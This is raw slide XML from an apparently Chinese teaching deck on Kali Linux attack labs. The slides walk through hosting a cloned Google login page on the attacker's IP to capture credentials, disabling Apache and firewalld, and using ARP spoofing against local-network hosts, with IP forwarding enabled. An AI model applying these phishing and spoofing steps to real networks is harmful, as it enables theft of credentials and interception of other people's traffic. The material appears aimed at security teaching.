                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>设置用于钓鱼的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>此处默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC5531"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>本机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>，同时会默认设定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>端口，故需要提前执行命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> stop apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>服务，避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>端口占用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>。攻击机未关闭防火墙可能就别人访问不了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>firewalld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="383A42"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Source Code Pro" panose="020B0604020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>上面访问 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>地址，进去是谷歌登录页面，输入账号和密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>登录后会进行跳转到谷歌官网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F4F4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>因为我们没跳转成功，所以此时账号密码没有显示出来</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4F4F4F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4F4F4F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4F4F4F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23562323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i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>终端报错：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> as root in a regular user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>sessin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> is not supported.($HOME is /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>bhl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> which is owned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> 1000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>分析：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>是的，原来普通权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>bhl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>，所以就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>bhl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>只能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>bhl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>来用咯，我</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>不配用啊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>解决：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>改变权限咯</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>bhl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -R root ./</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40770697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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36598225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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21067966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chemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-t target:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>如果没有指定，将对局域网中所有主机进行欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20024470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开启路由转发，如果不开启，择目标主机就无法访问网络</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看攻击主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存表。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
